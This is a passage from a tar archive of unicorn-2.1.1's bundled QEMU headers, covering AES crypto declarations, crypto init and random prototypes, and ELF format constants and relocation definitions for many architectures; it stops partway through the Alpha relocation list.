����������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/crypto/aes.h�������������������������������������������������������������0000664�0000000�0000000�00000004124�14675241067�0020040�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#ifndef QEMU_AES_H #define QEMU_AES_H #define AES_MAXNR 14 #define AES_BLOCK_SIZE 16 struct aes_key_st { uint32_t rd_key[4 *(AES_MAXNR + 1)]; int rounds; }; typedef struct aes_key_st AES_KEY; /* FreeBSD/OpenSSL have their own AES functions with the same names in -lcrypto * (which might be pulled in via curl), so redefine to avoid conflicts. 
*/ #define AES_set_encrypt_key QEMU_AES_set_encrypt_key #define AES_set_decrypt_key QEMU_AES_set_decrypt_key #define AES_encrypt QEMU_AES_encrypt #define AES_decrypt QEMU_AES_decrypt #define AES_cbc_encrypt QEMU_AES_cbc_encrypt int AES_set_encrypt_key(const unsigned char *userKey, const int bits, AES_KEY *key); int AES_set_decrypt_key(const unsigned char *userKey, const int bits, AES_KEY *key); void AES_encrypt(const unsigned char *in, unsigned char *out, const AES_KEY *key); void AES_decrypt(const unsigned char *in, unsigned char *out, const AES_KEY *key); void AES_cbc_encrypt(const unsigned char *in, unsigned char *out, const unsigned long length, const AES_KEY *key, unsigned char *ivec, const int enc); extern const uint8_t AES_sbox[256]; extern const uint8_t AES_isbox[256]; /* AES ShiftRows and InvShiftRows */ extern const uint8_t AES_shifts[16]; extern const uint8_t AES_ishifts[16]; /* AES InvMixColumns */ /* AES_imc[x][0] = [x].[0e, 09, 0d, 0b]; */ /* AES_imc[x][1] = [x].[0b, 0e, 09, 0d]; */ /* AES_imc[x][2] = [x].[0d, 0b, 0e, 09]; */ /* AES_imc[x][3] = [x].[09, 0d, 0b, 0e]; */ extern const uint32_t AES_imc[256][4]; /* AES_Te0[x] = S [x].[02, 01, 01, 03]; AES_Te1[x] = S [x].[03, 02, 01, 01]; AES_Te2[x] = S [x].[01, 03, 02, 01]; AES_Te3[x] = S [x].[01, 01, 03, 02]; AES_Te4[x] = S [x].[01, 01, 01, 01]; AES_Td0[x] = Si[x].[0e, 09, 0d, 0b]; AES_Td1[x] = Si[x].[0b, 0e, 09, 0d]; AES_Td2[x] = Si[x].[0d, 0b, 0e, 09]; AES_Td3[x] = Si[x].[09, 0d, 0b, 0e]; AES_Td4[x] = Si[x].[01, 01, 01, 01]; */ extern const uint32_t AES_Te0[256], AES_Te1[256], AES_Te2[256], AES_Te3[256], AES_Te4[256]; extern const uint32_t AES_Td0[256], AES_Td1[256], AES_Td2[256], AES_Td3[256], AES_Td4[256]; #endif ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/crypto/init.h������������������������������������������������������������0000664�0000000�0000000�00000001564�14675241067�0020240�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU Crypto initialization * * Copyright (c) 2015 Red Hat, Inc. * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. 
* */ #ifndef QCRYPTO_INIT_H #define QCRYPTO_INIT_H #include "qapi/error.h" int qcrypto_init(Error **errp); #endif /* QCRYPTO_INIT_H */ ��������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/crypto/random.h����������������������������������������������������������0000664�0000000�0000000�00000001760�14675241067�0020553�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU Crypto random number provider * * Copyright (c) 2015-2016 Red Hat, Inc. * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. * */ #ifndef QCRYPTO_RANDOM_H #define QCRYPTO_RANDOM_H /** * qcrypto_random_init: * * Initializes the handles used by qcrypto_random_bytes * * Returns 0 on success, -1 on error */ int qcrypto_random_init(void); #endif /* QCRYPTO_RANDOM_H */ ����������������unicorn-2.1.1/qemu/include/elf.h��������������������������������������������������������������������0000664�0000000�0000000�00000205767�14675241067�0016536�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#ifndef QEMU_ELF_H #define QEMU_ELF_H /* 32-bit ELF base types. */ typedef uint32_t Elf32_Addr; typedef uint16_t Elf32_Half; typedef uint32_t Elf32_Off; typedef int32_t Elf32_Sword; typedef uint32_t Elf32_Word; /* 64-bit ELF base types. */ typedef uint64_t Elf64_Addr; typedef uint16_t Elf64_Half; typedef int16_t Elf64_SHalf; typedef uint64_t Elf64_Off; typedef int32_t Elf64_Sword; typedef uint32_t Elf64_Word; typedef uint64_t Elf64_Xword; typedef int64_t Elf64_Sxword; /* These constants are for the segment types stored in the image headers */ #define PT_NULL 0 #define PT_LOAD 1 #define PT_DYNAMIC 2 #define PT_INTERP 3 #define PT_NOTE 4 #define PT_SHLIB 5 #define PT_PHDR 6 #define PT_LOPROC 0x70000000 #define PT_HIPROC 0x7fffffff #define PT_MIPS_REGINFO 0x70000000 #define PT_MIPS_RTPROC 0x70000001 #define PT_MIPS_OPTIONS 0x70000002 #define PT_MIPS_ABIFLAGS 0x70000003 /* Flags in the e_flags field of the header */ /* MIPS architecture level. */ #define EF_MIPS_ARCH 0xf0000000 /* Legal values for MIPS architecture level. */ #define EF_MIPS_ARCH_1 0x00000000 /* -mips1 code. */ #define EF_MIPS_ARCH_2 0x10000000 /* -mips2 code. */ #define EF_MIPS_ARCH_3 0x20000000 /* -mips3 code. */ #define EF_MIPS_ARCH_4 0x30000000 /* -mips4 code. 
*/ #define EF_MIPS_ARCH_5 0x40000000 /* -mips5 code. */ #define EF_MIPS_ARCH_32 0x50000000 /* MIPS32 code. */ #define EF_MIPS_ARCH_64 0x60000000 /* MIPS64 code. */ #define EF_MIPS_ARCH_32R2 0x70000000 /* MIPS32r2 code. */ #define EF_MIPS_ARCH_64R2 0x80000000 /* MIPS64r2 code. */ #define EF_MIPS_ARCH_32R6 0x90000000 /* MIPS32r6 code. */ #define EF_MIPS_ARCH_64R6 0xa0000000 /* MIPS64r6 code. */ /* The ABI of a file. */ #define EF_MIPS_ABI_O32 0x00001000 /* O32 ABI. */ #define EF_MIPS_ABI_O64 0x00002000 /* O32 extended for 64 bit. */ #define EF_MIPS_NOREORDER 0x00000001 #define EF_MIPS_PIC 0x00000002 #define EF_MIPS_CPIC 0x00000004 #define EF_MIPS_ABI2 0x00000020 #define EF_MIPS_OPTIONS_FIRST 0x00000080 #define EF_MIPS_32BITMODE 0x00000100 #define EF_MIPS_ABI 0x0000f000 #define EF_MIPS_FP64 0x00000200 #define EF_MIPS_NAN2008 0x00000400 /* MIPS machine variant */ #define EF_MIPS_MACH_NONE 0x00000000 /* A standard MIPS implementation */ #define EF_MIPS_MACH_3900 0x00810000 /* Toshiba R3900 */ #define EF_MIPS_MACH_4010 0x00820000 /* LSI R4010 */ #define EF_MIPS_MACH_4100 0x00830000 /* NEC VR4100 */ #define EF_MIPS_MACH_4650 0x00850000 /* MIPS R4650 */ #define EF_MIPS_MACH_4120 0x00870000 /* NEC VR4120 */ #define EF_MIPS_MACH_4111 0x00880000 /* NEC VR4111/VR4181 */ #define EF_MIPS_MACH_SB1 0x008a0000 /* Broadcom SB-1 */ #define EF_MIPS_MACH_OCTEON 0x008b0000 /* Cavium Networks Octeon */ #define EF_MIPS_MACH_XLR 0x008c0000 /* RMI Xlr */ #define EF_MIPS_MACH_OCTEON2 0x008d0000 /* Cavium Networks Octeon2 */ #define EF_MIPS_MACH_OCTEON3 0x008e0000 /* Cavium Networks Octeon3 */ #define EF_MIPS_MACH_5400 0x00910000 /* NEC VR5400 */ #define EF_MIPS_MACH_5900 0x00920000 /* Toshiba/Sony R5900 */ #define EF_MIPS_MACH_5500 0x00980000 /* NEC VR5500 */ #define EF_MIPS_MACH_9000 0x00990000 /* PMC-Sierra RM9000 */ #define EF_MIPS_MACH_LS2E 0x00a00000 /* ST Microelectronics Loongson 2E */ #define EF_MIPS_MACH_LS2F 0x00a10000 /* ST Microelectronics Loongson 2F */ #define EF_MIPS_MACH_LS3A 0x00a20000 /* ST Microelectronics Loongson 3A */ #define EF_MIPS_MACH 0x00ff0000 /* EF_MIPS_MACH_xxx selection mask */ #define MIPS_ABI_FP_UNKNOWN (-1) /* Unknown FP ABI (internal) */ #define MIPS_ABI_FP_ANY 0x0 /* FP ABI doesn't matter */ #define MIPS_ABI_FP_DOUBLE 0x1 /* -mdouble-float */ #define MIPS_ABI_FP_SINGLE 0x2 /* -msingle-float */ #define MIPS_ABI_FP_SOFT 0x3 /* -msoft-float */ #define MIPS_ABI_FP_OLD_64 0x4 /* -mips32r2 -mfp64 */ #define MIPS_ABI_FP_XX 0x5 /* -mfpxx */ #define MIPS_ABI_FP_64 0x6 /* -mips32r2 -mfp64 */ #define MIPS_ABI_FP_64A 0x7 /* -mips32r2 -mfp64 -mno-odd-spreg */ typedef struct mips_elf_abiflags_v0 { uint16_t version; /* Version of flags structure */ uint8_t isa_level; /* The level of the ISA: 1-5, 32, 64 */ uint8_t isa_rev; /* The revision of ISA: */ /* - 0 for MIPS V and below, */ /* - 1-n otherwise. 
*/ uint8_t gpr_size; /* The size of general purpose registers */ uint8_t cpr1_size; /* The size of co-processor 1 registers */ uint8_t cpr2_size; /* The size of co-processor 2 registers */ uint8_t fp_abi; /* The floating-point ABI */ uint32_t isa_ext; /* Mask of processor-specific extensions */ uint32_t ases; /* Mask of ASEs used */ uint32_t flags1; /* Mask of general flags */ uint32_t flags2; } Mips_elf_abiflags_v0; /* These constants define the different elf file types */ #define ET_NONE 0 #define ET_REL 1 #define ET_EXEC 2 #define ET_DYN 3 #define ET_CORE 4 #define ET_LOPROC 0xff00 #define ET_HIPROC 0xffff /* These constants define the various ELF target machines */ #define EM_NONE 0 #define EM_M32 1 #define EM_SPARC 2 #define EM_386 3 #define EM_68K 4 #define EM_88K 5 #define EM_486 6 /* Perhaps disused */ #define EM_860 7 #define EM_MIPS 8 /* MIPS R3000 (officially, big-endian only) */ #define EM_MIPS_RS4_BE 10 /* MIPS R4000 big-endian */ #define EM_PARISC 15 /* HPPA */ #define EM_SPARC32PLUS 18 /* Sun's "v8plus" */ #define EM_PPC 20 /* PowerPC */ #define EM_PPC64 21 /* PowerPC64 */ #define EM_ARM 40 /* ARM */ #define EM_SH 42 /* SuperH */ #define EM_SPARCV9 43 /* SPARC v9 64-bit */ #define EM_TRICORE 44 /* Infineon TriCore */ #define EM_IA_64 50 /* HP/Intel IA-64 */ #define EM_X86_64 62 /* AMD x86-64 */ #define EM_S390 22 /* IBM S/390 */ #define EM_CRIS 76 /* Axis Communications 32-bit embedded processor */ #define EM_V850 87 /* NEC v850 */ #define EM_H8_300H 47 /* Hitachi H8/300H */ #define EM_H8S 48 /* Hitachi H8S */ #define EM_LATTICEMICO32 138 /* LatticeMico32 */ #define EM_OPENRISC 92 /* OpenCores OpenRISC */ #define EM_UNICORE32 110 /* UniCore32 */ #define EM_RISCV 243 /* RISC-V */ #define EM_NANOMIPS 249 /* Wave Computing nanoMIPS */ /* * This is an interim value that we will use until the committee comes * up with a final number. */ #define EM_ALPHA 0x9026 /* Bogus old v850 magic number, used by old tools. */ #define EM_CYGNUS_V850 0x9080 /* * This is the old interim value for S/390 architecture */ #define EM_S390_OLD 0xA390 #define EM_ALTERA_NIOS2 113 /* Altera Nios II soft-core processor */ #define EM_MICROBLAZE 189 #define EM_MICROBLAZE_OLD 0xBAAB #define EM_XTENSA 94 /* Tensilica Xtensa */ #define EM_AARCH64 183 #define EM_TILEGX 191 /* TILE-Gx */ #define EM_MOXIE 223 /* Moxie processor family */ #define EM_MOXIE_OLD 0xFEED /* This is the info that is needed to parse the dynamic section of the file */ #define DT_NULL 0 #define DT_NEEDED 1 #define DT_PLTRELSZ 2 #define DT_PLTGOT 3 #define DT_HASH 4 #define DT_STRTAB 5 #define DT_SYMTAB 6 #define DT_RELA 7 #define DT_RELASZ 8 #define DT_RELAENT 9 #define DT_STRSZ 10 #define DT_SYMENT 11 #define DT_INIT 12 #define DT_FINI 13 #define DT_SONAME 14 #define DT_RPATH 15 #define DT_SYMBOLIC 16 #define DT_REL 17 #define DT_RELSZ 18 #define DT_RELENT 19 #define DT_PLTREL 20 #define DT_DEBUG 21 #define DT_TEXTREL 22 #define DT_JMPREL 23 #define DT_BINDNOW 24 #define DT_INIT_ARRAY 25 #define DT_FINI_ARRAY 26 #define DT_INIT_ARRAYSZ 27 #define DT_FINI_ARRAYSZ 28 #define DT_RUNPATH 29 #define DT_FLAGS 30 #define DT_LOOS 0x6000000d #define DT_HIOS 0x6ffff000 #define DT_LOPROC 0x70000000 #define DT_HIPROC 0x7fffffff /* DT_ entries which fall between DT_VALRNGLO and DT_VALRNDHI use the d_val field of the Elf*_Dyn structure. I.e. they contain scalars. */ #define DT_VALRNGLO 0x6ffffd00 #define DT_VALRNGHI 0x6ffffdff /* DT_ entries which fall between DT_ADDRRNGLO and DT_ADDRRNGHI use the d_ptr field of the Elf*_Dyn structure. I.e. 
they contain pointers. */ #define DT_ADDRRNGLO 0x6ffffe00 #define DT_ADDRRNGHI 0x6ffffeff #define DT_VERSYM 0x6ffffff0 #define DT_RELACOUNT 0x6ffffff9 #define DT_RELCOUNT 0x6ffffffa #define DT_FLAGS_1 0x6ffffffb #define DT_VERDEF 0x6ffffffc #define DT_VERDEFNUM 0x6ffffffd #define DT_VERNEED 0x6ffffffe #define DT_VERNEEDNUM 0x6fffffff #define DT_MIPS_RLD_VERSION 0x70000001 #define DT_MIPS_TIME_STAMP 0x70000002 #define DT_MIPS_ICHECKSUM 0x70000003 #define DT_MIPS_IVERSION 0x70000004 #define DT_MIPS_FLAGS 0x70000005 #define RHF_NONE 0 #define RHF_HARDWAY 1 #define RHF_NOTPOT 2 #define DT_MIPS_BASE_ADDRESS 0x70000006 #define DT_MIPS_CONFLICT 0x70000008 #define DT_MIPS_LIBLIST 0x70000009 #define DT_MIPS_LOCAL_GOTNO 0x7000000a #define DT_MIPS_CONFLICTNO 0x7000000b #define DT_MIPS_LIBLISTNO 0x70000010 #define DT_MIPS_SYMTABNO 0x70000011 #define DT_MIPS_UNREFEXTNO 0x70000012 #define DT_MIPS_GOTSYM 0x70000013 #define DT_MIPS_HIPAGENO 0x70000014 #define DT_MIPS_RLD_MAP 0x70000016 /* This info is needed when parsing the symbol table */ #define STB_LOCAL 0 #define STB_GLOBAL 1 #define STB_WEAK 2 #define STT_NOTYPE 0 #define STT_OBJECT 1 #define STT_FUNC 2 #define STT_SECTION 3 #define STT_FILE 4 #define ELF_ST_BIND(x) ((x) >> 4) #define ELF_ST_TYPE(x) (((unsigned int) x) & 0xf) #define ELF_ST_INFO(bind, type) (((bind) << 4) | ((type) & 0xf)) #define ELF32_ST_BIND(x) ELF_ST_BIND(x) #define ELF32_ST_TYPE(x) ELF_ST_TYPE(x) #define ELF64_ST_BIND(x) ELF_ST_BIND(x) #define ELF64_ST_TYPE(x) ELF_ST_TYPE(x) /* Symbolic values for the entries in the auxiliary table put on the initial stack */ #define AT_NULL 0 /* end of vector */ #define AT_IGNORE 1 /* entry should be ignored */ #define AT_EXECFD 2 /* file descriptor of program */ #define AT_PHDR 3 /* program headers for program */ #define AT_PHENT 4 /* size of program header entry */ #define AT_PHNUM 5 /* number of program headers */ #define AT_PAGESZ 6 /* system page size */ #define AT_BASE 7 /* base address of interpreter */ #define AT_FLAGS 8 /* flags */ #define AT_ENTRY 9 /* entry point of program */ #define AT_NOTELF 10 /* program is not ELF */ #define AT_UID 11 /* real uid */ #define AT_EUID 12 /* effective uid */ #define AT_GID 13 /* real gid */ #define AT_EGID 14 /* effective gid */ #define AT_PLATFORM 15 /* string identifying CPU for optimizations */ #define AT_HWCAP 16 /* arch dependent hints at CPU capabilities */ #define AT_CLKTCK 17 /* frequency at which times() increments */ #define AT_FPUCW 18 /* info about fpu initialization by kernel */ #define AT_DCACHEBSIZE 19 /* data cache block size */ #define AT_ICACHEBSIZE 20 /* instruction cache block size */ #define AT_UCACHEBSIZE 21 /* unified cache block size */ #define AT_IGNOREPPC 22 /* ppc only; entry should be ignored */ #define AT_SECURE 23 /* boolean, was exec suid-like? */ #define AT_BASE_PLATFORM 24 /* string identifying real platforms */ #define AT_RANDOM 25 /* address of 16 random bytes */ #define AT_HWCAP2 26 /* extension of AT_HWCAP */ #define AT_EXECFN 31 /* filename of the executable */ #define AT_SYSINFO 32 /* address of kernel entry point */ #define AT_SYSINFO_EHDR 33 /* address of kernel vdso */ #define AT_L1I_CACHESHAPE 34 /* shapes of the caches: */ #define AT_L1D_CACHESHAPE 35 /* bits 0-3: cache associativity. */ #define AT_L2_CACHESHAPE 36 /* bits 4-7: log2 of line size. */ #define AT_L3_CACHESHAPE 37 /* val&~255: cache size. 
*/ typedef struct dynamic{ Elf32_Sword d_tag; union{ Elf32_Sword d_val; Elf32_Addr d_ptr; } d_un; } Elf32_Dyn; typedef struct { Elf64_Sxword d_tag; /* entry tag value */ union { Elf64_Xword d_val; Elf64_Addr d_ptr; } d_un; } Elf64_Dyn; /* The following are used with relocations */ #define ELF32_R_SYM(x) ((x) >> 8) #define ELF32_R_TYPE(x) ((x) & 0xff) #define ELF64_R_SYM(i) ((i) >> 32) #define ELF64_R_TYPE(i) ((i) & 0xffffffff) #define ELF64_R_TYPE_DATA(i) (((ELF64_R_TYPE(i) >> 8) ^ 0x00800000) - 0x00800000) #define R_386_NONE 0 #define R_386_32 1 #define R_386_PC32 2 #define R_386_GOT32 3 #define R_386_PLT32 4 #define R_386_COPY 5 #define R_386_GLOB_DAT 6 #define R_386_JMP_SLOT 7 #define R_386_RELATIVE 8 #define R_386_GOTOFF 9 #define R_386_GOTPC 10 #define R_386_NUM 11 /* Not a dynamic reloc, so not included in R_386_NUM. Used in TCG. */ #define R_386_PC8 23 #define R_MIPS_NONE 0 #define R_MIPS_16 1 #define R_MIPS_32 2 #define R_MIPS_REL32 3 #define R_MIPS_26 4 #define R_MIPS_HI16 5 #define R_MIPS_LO16 6 #define R_MIPS_GPREL16 7 #define R_MIPS_LITERAL 8 #define R_MIPS_GOT16 9 #define R_MIPS_PC16 10 #define R_MIPS_CALL16 11 #define R_MIPS_GPREL32 12 /* The remaining relocs are defined on Irix, although they are not in the MIPS ELF ABI. */ #define R_MIPS_UNUSED1 13 #define R_MIPS_UNUSED2 14 #define R_MIPS_UNUSED3 15 #define R_MIPS_SHIFT5 16 #define R_MIPS_SHIFT6 17 #define R_MIPS_64 18 #define R_MIPS_GOT_DISP 19 #define R_MIPS_GOT_PAGE 20 #define R_MIPS_GOT_OFST 21 /* * The following two relocation types are specified in the MIPS ABI * conformance guide version 1.2 but not yet in the psABI. */ #define R_MIPS_GOTHI16 22 #define R_MIPS_GOTLO16 23 #define R_MIPS_SUB 24 #define R_MIPS_INSERT_A 25 #define R_MIPS_INSERT_B 26 #define R_MIPS_DELETE 27 #define R_MIPS_HIGHER 28 #define R_MIPS_HIGHEST 29 /* * The following two relocation types are specified in the MIPS ABI * conformance guide version 1.2 but not yet in the psABI. */ #define R_MIPS_CALLHI16 30 #define R_MIPS_CALLLO16 31 /* * This range is reserved for vendor specific relocations. */ #define R_MIPS_LOVENDOR 100 #define R_MIPS_HIVENDOR 127 /* SUN SPARC specific definitions. */ /* Values for Elf64_Ehdr.e_flags. 
*/ #define EF_SPARCV9_MM 3 #define EF_SPARCV9_TSO 0 #define EF_SPARCV9_PSO 1 #define EF_SPARCV9_RMO 2 #define EF_SPARC_LEDATA 0x800000 /* little endian data */ #define EF_SPARC_EXT_MASK 0xFFFF00 #define EF_SPARC_32PLUS 0x000100 /* generic V8+ features */ #define EF_SPARC_SUN_US1 0x000200 /* Sun UltraSPARC1 extensions */ #define EF_SPARC_HAL_R1 0x000400 /* HAL R1 extensions */ #define EF_SPARC_SUN_US3 0x000800 /* Sun UltraSPARCIII extensions */ /* * Sparc ELF relocation types */ #define R_SPARC_NONE 0 #define R_SPARC_8 1 #define R_SPARC_16 2 #define R_SPARC_32 3 #define R_SPARC_DISP8 4 #define R_SPARC_DISP16 5 #define R_SPARC_DISP32 6 #define R_SPARC_WDISP30 7 #define R_SPARC_WDISP22 8 #define R_SPARC_HI22 9 #define R_SPARC_22 10 #define R_SPARC_13 11 #define R_SPARC_LO10 12 #define R_SPARC_GOT10 13 #define R_SPARC_GOT13 14 #define R_SPARC_GOT22 15 #define R_SPARC_PC10 16 #define R_SPARC_PC22 17 #define R_SPARC_WPLT30 18 #define R_SPARC_COPY 19 #define R_SPARC_GLOB_DAT 20 #define R_SPARC_JMP_SLOT 21 #define R_SPARC_RELATIVE 22 #define R_SPARC_UA32 23 #define R_SPARC_PLT32 24 #define R_SPARC_HIPLT22 25 #define R_SPARC_LOPLT10 26 #define R_SPARC_PCPLT32 27 #define R_SPARC_PCPLT22 28 #define R_SPARC_PCPLT10 29 #define R_SPARC_10 30 #define R_SPARC_11 31 #define R_SPARC_64 32 #define R_SPARC_OLO10 33 #define R_SPARC_HH22 34 #define R_SPARC_HM10 35 #define R_SPARC_LM22 36 #define R_SPARC_WDISP16 40 #define R_SPARC_WDISP19 41 #define R_SPARC_7 43 #define R_SPARC_5 44 #define R_SPARC_6 45 /* Bits present in AT_HWCAP for ARM. */ #define HWCAP_ARM_SWP (1 << 0) #define HWCAP_ARM_HALF (1 << 1) #define HWCAP_ARM_THUMB (1 << 2) #define HWCAP_ARM_26BIT (1 << 3) #define HWCAP_ARM_FAST_MULT (1 << 4) #define HWCAP_ARM_FPA (1 << 5) #define HWCAP_ARM_VFP (1 << 6) #define HWCAP_ARM_EDSP (1 << 7) #define HWCAP_ARM_JAVA (1 << 8) #define HWCAP_ARM_IWMMXT (1 << 9) #define HWCAP_ARM_CRUNCH (1 << 10) #define HWCAP_ARM_THUMBEE (1 << 11) #define HWCAP_ARM_NEON (1 << 12) #define HWCAP_ARM_VFPv3 (1 << 13) #define HWCAP_ARM_VFPv3D16 (1 << 14) /* also set for VFPv4-D16 */ #define HWCAP_ARM_TLS (1 << 15) #define HWCAP_ARM_VFPv4 (1 << 16) #define HWCAP_ARM_IDIVA (1 << 17) #define HWCAP_ARM_IDIVT (1 << 18) #define HWCAP_IDIV (HWCAP_IDIVA | HWCAP_IDIVT) #define HWCAP_VFPD32 (1 << 19) /* set if VFP has 32 regs */ #define HWCAP_LPAE (1 << 20) /* Bits present in AT_HWCAP for PowerPC. 
*/ #define PPC_FEATURE_32 0x80000000 #define PPC_FEATURE_64 0x40000000 #define PPC_FEATURE_601_INSTR 0x20000000 #define PPC_FEATURE_HAS_ALTIVEC 0x10000000 #define PPC_FEATURE_HAS_FPU 0x08000000 #define PPC_FEATURE_HAS_MMU 0x04000000 #define PPC_FEATURE_HAS_4xxMAC 0x02000000 #define PPC_FEATURE_UNIFIED_CACHE 0x01000000 #define PPC_FEATURE_HAS_SPE 0x00800000 #define PPC_FEATURE_HAS_EFP_SINGLE 0x00400000 #define PPC_FEATURE_HAS_EFP_DOUBLE 0x00200000 #define PPC_FEATURE_NO_TB 0x00100000 #define PPC_FEATURE_POWER4 0x00080000 #define PPC_FEATURE_POWER5 0x00040000 #define PPC_FEATURE_POWER5_PLUS 0x00020000 #define PPC_FEATURE_CELL 0x00010000 #define PPC_FEATURE_BOOKE 0x00008000 #define PPC_FEATURE_SMT 0x00004000 #define PPC_FEATURE_ICACHE_SNOOP 0x00002000 #define PPC_FEATURE_ARCH_2_05 0x00001000 #define PPC_FEATURE_PA6T 0x00000800 #define PPC_FEATURE_HAS_DFP 0x00000400 #define PPC_FEATURE_POWER6_EXT 0x00000200 #define PPC_FEATURE_ARCH_2_06 0x00000100 #define PPC_FEATURE_HAS_VSX 0x00000080 #define PPC_FEATURE_PSERIES_PERFMON_COMPAT \ 0x00000040 #define PPC_FEATURE_TRUE_LE 0x00000002 #define PPC_FEATURE_PPC_LE 0x00000001 /* Bits present in AT_HWCAP2 for PowerPC. */ #define PPC_FEATURE2_ARCH_2_07 0x80000000 #define PPC_FEATURE2_HAS_HTM 0x40000000 #define PPC_FEATURE2_HAS_DSCR 0x20000000 #define PPC_FEATURE2_HAS_EBB 0x10000000 #define PPC_FEATURE2_HAS_ISEL 0x08000000 #define PPC_FEATURE2_HAS_TAR 0x04000000 #define PPC_FEATURE2_HAS_VEC_CRYPTO 0x02000000 #define PPC_FEATURE2_HTM_NOSC 0x01000000 #define PPC_FEATURE2_ARCH_3_00 0x00800000 #define PPC_FEATURE2_HAS_IEEE128 0x00400000 /* Bits present in AT_HWCAP for Sparc. */ #define HWCAP_SPARC_FLUSH 0x00000001 #define HWCAP_SPARC_STBAR 0x00000002 #define HWCAP_SPARC_SWAP 0x00000004 #define HWCAP_SPARC_MULDIV 0x00000008 #define HWCAP_SPARC_V9 0x00000010 #define HWCAP_SPARC_ULTRA3 0x00000020 #define HWCAP_SPARC_BLKINIT 0x00000040 #define HWCAP_SPARC_N2 0x00000080 #define HWCAP_SPARC_MUL32 0x00000100 #define HWCAP_SPARC_DIV32 0x00000200 #define HWCAP_SPARC_FSMULD 0x00000400 #define HWCAP_SPARC_V8PLUS 0x00000800 #define HWCAP_SPARC_POPC 0x00001000 #define HWCAP_SPARC_VIS 0x00002000 #define HWCAP_SPARC_VIS2 0x00004000 #define HWCAP_SPARC_ASI_BLK_INIT 0x00008000 #define HWCAP_SPARC_FMAF 0x00010000 #define HWCAP_SPARC_VIS3 0x00020000 #define HWCAP_SPARC_HPC 0x00040000 #define HWCAP_SPARC_RANDOM 0x00080000 #define HWCAP_SPARC_TRANS 0x00100000 #define HWCAP_SPARC_FJFMAU 0x00200000 #define HWCAP_SPARC_IMA 0x00400000 #define HWCAP_SPARC_ASI_CACHE_SPARING 0x00800000 #define HWCAP_SPARC_PAUSE 0x01000000 #define HWCAP_SPARC_CBCOND 0x02000000 #define HWCAP_SPARC_CRYPTO 0x04000000 /* Bits present in AT_HWCAP for s390. */ #define HWCAP_S390_ESAN3 1 #define HWCAP_S390_ZARCH 2 #define HWCAP_S390_STFLE 4 #define HWCAP_S390_MSA 8 #define HWCAP_S390_LDISP 16 #define HWCAP_S390_EIMM 32 #define HWCAP_S390_DFP 64 #define HWCAP_S390_HPAGE 128 #define HWCAP_S390_ETF3EH 256 #define HWCAP_S390_HIGH_GPRS 512 #define HWCAP_S390_TE 1024 #define HWCAP_S390_VXRS 2048 /* M68K specific definitions. */ /* We use the top 24 bits to encode information about the architecture variant. */ #define EF_M68K_CPU32 0x00810000 #define EF_M68K_M68000 0x01000000 #define EF_M68K_CFV4E 0x00008000 #define EF_M68K_FIDO 0x02000000 #define EF_M68K_ARCH_MASK \ (EF_M68K_M68000 | EF_M68K_CPU32 | EF_M68K_CFV4E | EF_M68K_FIDO) /* We use the bottom 8 bits to encode information about the coldfire variant. If we use any of these bits, the top 24 bits are either 0 or EF_M68K_CFV4E. 
*/ #define EF_M68K_CF_ISA_MASK 0x0F /* Which ISA */ #define EF_M68K_CF_ISA_A_NODIV 0x01 /* ISA A except for div */ #define EF_M68K_CF_ISA_A 0x02 #define EF_M68K_CF_ISA_A_PLUS 0x03 #define EF_M68K_CF_ISA_B_NOUSP 0x04 /* ISA_B except for USP */ #define EF_M68K_CF_ISA_B 0x05 #define EF_M68K_CF_ISA_C 0x06 #define EF_M68K_CF_ISA_C_NODIV 0x07 /* ISA C except for div */ #define EF_M68K_CF_MAC_MASK 0x30 #define EF_M68K_CF_MAC 0x10 /* MAC */ #define EF_M68K_CF_EMAC 0x20 /* EMAC */ #define EF_M68K_CF_EMAC_B 0x30 /* EMAC_B */ #define EF_M68K_CF_FLOAT 0x40 /* Has float insns */ #define EF_M68K_CF_MASK 0xFF /* * 68k ELF relocation types */ #define R_68K_NONE 0 #define R_68K_32 1 #define R_68K_16 2 #define R_68K_8 3 #define R_68K_PC32 4 #define R_68K_PC16 5 #define R_68K_PC8 6 #define R_68K_GOT32 7 #define R_68K_GOT16 8 #define R_68K_GOT8 9 #define R_68K_GOT32O 10 #define R_68K_GOT16O 11 #define R_68K_GOT8O 12 #define R_68K_PLT32 13 #define R_68K_PLT16 14 #define R_68K_PLT8 15 #define R_68K_PLT32O 16 #define R_68K_PLT16O 17 #define R_68K_PLT8O 18 #define R_68K_COPY 19 #define R_68K_GLOB_DAT 20 #define R_68K_JMP_SLOT 21 #define R_68K_RELATIVE 22 /* * Alpha ELF relocation types */ #define R_ALPHA_NONE 0 /* No reloc */ #define R_ALPHA_REFLONG 1 /* Direct 32 bit */ #define R_ALPHA_REFQUAD 2 /* Direct 64 bit */ #define R_ALPHA_GPREL32 3 /* GP relative 32 bit */ #define R_ALPHA_LITERAL 4 /* GP relative 16 bit w/optimization */ #define R_ALPHA_LITUSE 5 /* Optimization hint for LITERAL */ #define R_ALPHA_GPDISP 6 /* Add displacement 